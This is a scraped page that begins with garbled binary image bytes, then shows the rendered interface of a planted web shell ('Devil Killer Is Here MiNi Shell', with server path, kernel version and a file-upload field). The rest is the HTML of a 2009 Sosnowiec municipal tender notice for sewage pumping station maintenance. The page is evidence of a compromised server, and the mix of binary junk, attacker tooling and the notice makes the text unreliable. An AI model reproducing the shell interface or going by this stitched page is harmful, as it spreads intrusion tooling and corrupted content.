JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090126/27879-N-2009.html

<p class="kh_header"><b>Sosnowiec: Eksploatacja i konserwacja przepompowni ścieków sanitarnych na terenie miasta Sosnowca</b><br>
<b>Numer ogłoszenia: 27879 - 2009; data zamieszczenia: 26.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sosnowiec - miasto posiadające prawa powiatu - reprezentowana przez Prezydenta Miasta , al. Zwycięstwa 20, 41-200 Sosnowiec, woj. śląskie, tel. 032 2960600, faks (032) 296 06 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Eksploatacja i konserwacja przepompowni ścieków sanitarnych na terenie miasta Sosnowca.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia    jest    świadczenie   usługi    obejmującej   eksploatację i konserwację przepompowni ścieków sanitarnych na terenie miasta Sosnowca: Parkowa I i Parkowa II przy ul. Adama Śliwki oraz Tuwima I przy ul. Juliana Tuwima i Tuwima II przy ul. Konstytucji.
Przedmiot zamówienia obejmuje:
-utrzymanie w nienagannej sprawności technicznej wszystkich obiektów przepompowni zgodnie z instrukcjami obsługi - 4 obiekty;
-czyszczenie podziemnych zbiorników czerpalnych -  4 szt.;
-czyszczenie zbiornika retencyjnego wód opadowych przy ul. Konstytucji -  1 szt.;
-utrzymanie we właściwym stanie czystościowym terenu w obrębie ogrodzenia (sprzątanie, koszenie traw, zgrabianie skoszonej trawy oraz wywóz trawy i zanieczyszczeń) - powierzchnia: 2.525,0 m2;
-dozorowanie obiektów - 4 obiekty;
-wykonanie okresowej kontroli raz w roku polegającej na sprawdzeniu stanu technicznego obiektów przepompowni zgodnie z art. 62 ust. 1 pkt1 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity - Dz. U. z 2006r. Nr 156, poz. 1118, z późniejszymi zmianami. Wyniki z przeprowadzonej kontroli - protokoły       wykonawca(-y) winien(-ni) przekazać zamawiającemu do dnia 31 stycznia 2010 i 2011 roku.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.48.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wykonawca(-y) przystępujący do postępowania jest (są) obowiązany(-ni) wnieść wadium w wysokości: 3.631,58zł, słownie: trzy tysiące sześćset trzydzieści jeden złotych i pięćdziesiąt osiem groszy.

2.Wykonawca(-y) obowiązany(-ni) jest (są) wnieść wadium przed upływem terminu składania ofert.

3.Wadium może być wnoszone w jednej lub kilku następujących formach:
a)pieniądzu, przelewem na rachunek bankowy - Gmina Sosnowiec 
ING Bank Śląski 97 1050 1142 1000 0008 0000 1208  
z dopiskiem 
Wadium do zamówienia publicznego:
Eksploatacja i konserwacja  przepompowni  ścieków sanitarnych  
na terenie miasta Sosnowca
  WGK.3410-01-08/09
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)gwarancjach bankowych, 
d)gwarancjach ubezpieczeniowych,
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju              Przedsiębiorczości (Dz.U. z 2000r., Nr 109, poz. 1158, z późniejszymi zmianami).
4.W przypadku złożenia przez wykonawcę(-ów) wadium w formie niepieniężnej wykonawca(-cy) zobowiązany(-ni) jest (są) załączyć do oferty kopię dokumentu stanowiącego wadium potwierdzoną za zgodność z oryginałem, a oryginał tego dokumentu:
a)zdeponować w  Wydziale Finansowym  Urzędu  Miejskiego w Sosnowcu, II piętro  pok. 310, w godzinach od 800 -1500 u Pani Anety Kwiecień, podczas jej               nieobecności u Pani Magdaleny Szymańskiej lub Pani Jolanty Gorlewskiej;
lub
b)załączyć osobno do oferty
5.W przypadku określonym w pkt 4. a) na kserokopii dokumentu stanowiącego wadium - załączonego do oferty - wykonawca(-cy) musi uzyskać poświadczenie o przyjęciu tego dokumentu wydane przez pracownice Wydziału Finansowego Urzędu Miejskiego w Sosnowcu wskazane w pkt 4.a). 
6.Za skuteczne wniesienie wadium w pieniądzu zamawiający uzna wadium, które    w oznaczonym terminie w dniu otwarcia ofert znajduje się na koncie zamawiającego.

7.Wadium w formie nie pieniężnej zamawiający uzna za skutecznie wniesione:
a)jeżeli  na kserokopii dokumentu stanowiącego wadium - załączonego do oferty - znajdzie się potwierdzenie służb Wydziału Finansowego o przyjęciu oryginału,
lub
b)do oferty załączy kserokopię tego dokumentu poświadczoną za zgodność z  oryginałem a oryginał załączy osobno do oferty.
8.Dokument stanowiący wadium musi posiadać zapewnienie  bezwarunkowej  zapłaty kwoty wadium w przypadkach określonych w art. 46 ust. 5 pkt 1, 2 i 3 ustawy.
9.Wykonawcę(-ów), którego(-ych) oferta nie będzie zabezpieczona akceptowaną formą wadium zamawiający wykluczy z postępowania (art. 24 ust.2 pkt 4 ustawy).
10. Zamawiający zwraca niezwłocznie wadium jeżeli:
a)  upłynął termin związania ofertą - 30 dni,
b)  zawarto umowę w sprawie zamówienia publicznego,
c)  zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich  wnoszenia.
11. Z zastrzeżeniem art. 46 ust. 4a ustawy zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy:
1)który wycofał ofertę przed upływem terminu składania ofert;
2)który został wykluczony z postępowania;
3)którego oferta została odrzucona.
12.Zamawiający  żąda  ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie art. 46 ust. 2 pkt 2 i 3 ustawy, jeżeli w wyniku     ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia           wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez zamawiającego.
13.Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.  Zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
14.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca(-y) w odpowiedzi na wezwanie, o którym mowa  w art. 26 ust. 3, nie złożył(-li) dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni (-nią), że wynika to z przyczyn nie leżących po jego (ich) stronie.
15.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca(-cy), którego(-ych) oferta została wybrana :
a) odmówił(-li) podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b) zawarcie  umowy  w  sprawie  zamówienia   publicznego   stało   się    niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1.posiadają uprawnienia do wykonywania usługi będącej przedmiotem niniejszego zamówienia, o których mowa w Sekcji III.2) Warunki udziału - Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu - pkt II.2 i II. 3.
2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem            technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia;    
a)wykonawca(-cy) musi(-szą) wykazać wykonanie, a w przypadku świadczeń      okresowych lub ciągłych wykonywanie co najmniej jednej usługi o podobnym         charakterze i wartości odpowiadającej niniejszemu zamówieniu, na które składa ofertę - w okresie ostatnich trzech lat przed dniem wszczęcia postępowania          o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
     
b)wykonawca(-cy) musi(-szą) dysponować sprzętem niezbędnym do wykonania niniejszego zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego, w tym co najmniej:
-samochód specjalistyczny typu WUKO,
-samochód lub ciągnik z przyczepą - wyposażone w plandeki zabezpieczające przed zanieczyszczaniem środowiska (podczas transportu odpadów z miejsca ich zgromadzenia do miejsca unieszkodliwiania),
-wciągarkę ręczną lub mechaniczną,
-pompę do wypompowywania nieczystości,
-pojemniki ze szczelnym zamknięciem,
-kosiarkę,
-narzędzia i przyrządy do robót elektrycznych i hydraulicznych.
c) wykonawca(-cy) musi(-szą) dysponować lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonywania zamówienia, w tym  co najmniej:
-jedną osobą posiadającą uprawnienia do zajmowania się eksploatacją  urządzeń, instalacji i sieci na stanowisku dozoru, 
-jedną osobą posiadającą uprawnienia do zajmowania się eksploatacją  urządzeń, instalacji i sieci na stanowisku eksploatacji, zgodnie z Rozporządzeniem  Ministra  Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci  (Dz.U. z 2003r., Nr 89,                     poz. 828, z późniejszymi zmianami)
oraz 
-jedną osobą z uprawnieniami budowlanymi w specjalizacji sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006r.w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2006r., Nr 83, poz. 578, z późniejszymi zmianami)
3. znajdują  się   w   sytuacji   ekonomicznej   i   finansowej   zapewniającej   wykonanie zamówienia;
4.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust .1 i ust. 2 ustawy.

Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu.

Stwierdzenie spełniania warunków udziału w postępowaniu wymaganych od            wykonawców będzie dokonane w oparciu o złożone wraz z ofertą: oświadczenia    o spełnianiu warunków oraz potwierdzające (spełnianie tych warunków) dokumenty - według formuły spełnia nie spełnia. 
Oświadczenia i dokumenty będą badane pod względem formalnoprawnym, pod względem ich aktualności, a także czy informacje w nich zawarte potwierdzają       spełnienie wymagań zamawiającego.
Dokumenty  potwierdzające  spełnianie  warunków  powinny  być  składane  w  formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę(-ców). 
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski i winny być poświadczone przez wykonawcę. Zamawiający nie wyraża zgody, o której mowa w art. 9 ust. 3 ustawy.
Zamawiający zastrzega sobie prawo sprawdzania w toku oceny oferty wiarygodności przedstawionych przez wykonawców dokumentów, oświadczeń, wykazów, danych i informacji. W przypadku gdy złożona kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii.
W przypadku stwierdzenia przez zamawiającego w trakcie sprawdzania ofert, że     złożenie oferty stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji - oferta zostanie przez zamawiającego            odrzucona na podstawie art. 89 ust. 1 pkt 3 ustawy.
Przedstawienie przez wykonawcę informacji nieprawdziwych mających wpływ na wynik postępowania o udzielenie niniejszego zamówienia skutkować będzie wykluczeniem wykonawcy z prowadzonego postępowania, zgodnie z art. 24 ust. 2 pkt 2 ustawy, niezależnie od innych skutków przewidzianych prawem.
Zamawiający oceni i porówna jedynie te oferty, które zostaną złożone przez wykonawców nie wykluczonych na podstawie (art. 24 ust. 1 i ust. 2 ustawy) lub(i) których oferty nie zostaną odrzucone na podstawie art. 24 ust. 4 i art. 89 ust. 1 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I. Wykaz wymaganych oświadczeń o: 
1.spełnianiu wymagań określonych w art. 22 ust 1 pkt 1 - 4 ustawy oraz nie podleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 ustawy, 2. zapoznaniu się z Specyfikacją i nie wnoszeniu do niej zastrzeżeń oraz zdobyciu koniecznych informacji do sporządzenia oferty, 3. związaniu ofertą w terminie od: do: ,4. wniesieniu wadium w wysokości zł ...w formie... , 5. przyjęciu warunków zapisanych we wzorze umowy i przystąpieniu do podpisania umowy w czasie wskazanym przez zamawiającego, jednak nie krótszym niż siedem dni licząc od daty otrzymania powiadomienia o wyborze swojej oferty, 6. zastrzeżeniu części oferty, która stanowi tajemnice przedsiębiorstwa (*), lub 7. ustanowieniu ją jawną w całości (*), 8. dokonaniu wyliczenia ceny ofertowej zgodnie z wymaganiami zamawiającego opisanymi w specyfikacji istotnych warunków zamówienia, dział IV, rozdział 6.

II. Wykaz dokumentów jakie mogą dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu. 

Dokumenty składane w celu potwierdzenia, że wykonawca(-cy) posiada(-ją) uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega(-ją) wykluczeniu na   podstawie art. 24 ust. 1 i ust. 2 ustawy.

1.Aktualny odpis z właściwego rejestru (*) albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej (*), jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert.

2.Zezwolenie na prowadzenie działalności w zakresie transportu odpadów i umowę   zawartą z przedsiębiorcą prowadzącym działalność w zakresie odzysku lub         unieszkodliwiania odpadów (*) lub dokument potwierdzający gotowość jej zawarcia (*) zgodnie z wymogami  wynikającymi z ustawy z dnia 27 kwietnia 2001r. o odpadach (Dz. U. z 2001r., Nr 62, poz. 628, z późniejszymi zmianami),
3.Decyzja  na  opróżnianie  zbiorników  bezodpływowych i  transport nieczystości  ciekłych zgodnie z  wymogami wynikającymi z ustawy z dnia 13 września o utrzymaniu czystości i porządku w  gminach (tekst jednolity: Dz.U. z 2005r., Nr 236, poz. 2008,z późniejszymi zmianami);
4.Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych (*) lub Kasy Rolniczego Ubezpieczenia Społecznego (*) potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne (*) lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie (*), odroczenie (*) lub  rozłożenie na raty zaległych płatności (*) lub wstrzymanie w całości wykonania decyzji właściwego organu (*) - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składnia ofert. 
5.Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 4-8 ustawy (*)  lub  art. 24 ust. 1  pkt  9  ustawy  (*)  wystawioną  nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert.

Dokumenty składane w celu potwierdzenia, że wykonawca(-cy) posiada(-ją)  niezbędną wiedzę i doświadczenie oraz dysponuje(-ą) potencjałem technicznym i osobami zdolnymi do wykonania zamówienia.

6.Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również  wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia         postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom     stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane  należycie.

7.Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń jakimi dysponuje(-ą) lub będzie dysponował(-li) wykonawca(-cy), w tym co najmniej sprzęt, o którym mowa w Sekcji III.2) Warunki udziału - Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełnienia tych warunków - pkt 2.b) niniejszego ogłoszenia lub(i) 
pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnego sprzętu, o którym mowa w Sekcji III.2) Warunki udziału - Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełnienia tych warunków - pkt 2.b) niniejszego ogłoszenia jeżeli w wykazie wskazał(-li) narzędzia i urządzenia, którymi będzie dysponował (*).
8.Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca(-cy) i które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności wraz z dokumentami potwierdzającymi ich kwalifikacje zawodowe wymienione w Sekcji III.2) Warunki udziału - Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełnienia tych warunków - pkt 2.c) niniejszego ogłoszenia zgodnie z Rozporządzeniem Ministra  Gospodarki, Pracy i Polityki Społecznej  z dnia 28 kwietnia 2003r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci  -  Dz. U. z 2003r.,Nr 89, poz. 828, z późniejszymi zmianami) 
lub(i)
pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności wraz z dokumentami potwierdzającymi ich kwalifikacje zawodowe wymienione w Sekcji III.2) Warunki udziału - Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełnienia tych warunków - pkt 2.c) niniejszego ogłoszenia zgodnie z Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci  - Dz. U. z 2003r., Nr 89, poz. 828, z późniejszymi zmianami), jeżeli w wykazie wskazał(-li) osoby, którymi będzie dysponował(*).

Dokumenty składane w celu potwierdzenia, że wykonawca(-cy) znajduje(-ją) się w sytuacji ekonomicznej  i finansowej zapewniającej wykonanie zamówienia.
9.Polisa  (*)  lub  inny  dokument  (*)  potwierdzający,  że  wykonawca jest ubezpieczony od  odpowiedzialności cywilnej w zakresie prowadzonej działalności.

Wykonawca, który załącza do oferty polisę lub inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, z terminem płatności w ratach powinien dołączyć dowód zapłaty składki (składek), zgodnie z wymaganym terminem określonym w polisie lub tym dokumencie.

III. Dokument wniesienia wadium.
Wykonawca(-cy) powinien(-ni) załączyć do oferty dokument potwierdzający wniesienie  wadium - w formach i zgodnie z procedurą określoną w Sekcji III.1) Warunki dotyczące zamówienia - Informacja na temat wadium.
IV. Informacje dla wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej.

Zamawiający wymaga zamiast dokumentów, o których mowa w Sekcji III.2 Warunki udziału- Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu - pkt II.1., II.4., II.5. niniejszego ogłoszenia - w zakresie art. 24 pkt 9 ustawy, dokumentów wystawionych w kraju w którym ma siedzibę lub miejsce zamieszkania, potwierdzających odpowiednio, że:
a)nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
b)nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub          rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - dokument powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
c)nie orzeczono wobec niego zakazu ubiegania się o zamówienie - dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

Zamawiający wymaga zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się wyżej wymienionych dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.

V. Informacje dla konsorcjum firm.

Jeżeli wykonawcy wspólnie ubiegają się o zamówienie (konsorcjum, spółka cywilna), zgodnie z art. 23 ustawy w związku z art. 141 ustawy zamawiający żąda, aby :  
wszyscy konsorcjanci (wspólnicy spółki cywilnej) dołączyli do oferty oświadczenia i dokumenty wymagane od wykonawców wymienione w Sekcji III.2) Warunki udziału -Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu.            
Dokumenty wymienione w Sekcji III.2) Warunki udziału - Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu - pkt II.2. - II.3. i II.6 - II.8, pkt III. składane mogą być wspólnie i takiej podlegać będą ocenie,
Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem konsorcjum (spółki cywilnej).
W przypadku wyboru przez zamawiającego oferty złożonej przez konsorcjum (spółkę cywilną), wykonawcy tworzący konsorcjum (spółkę cywilną) obowiązani będą, najpóźniej przed zawarciem umowy na wykonanie zamówienia, do przedłożenia umowy konsorcjum (spółki cywilnej),
Umowa o której mowa wyżej winna zawierać w szczególności: oznaczenie stron, cel działania, czas trwania umowy, zasady współdziałania, w tym zakres prac przewidzianych przez każdą ze stron oraz zasady dokonywania rozliczeń..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
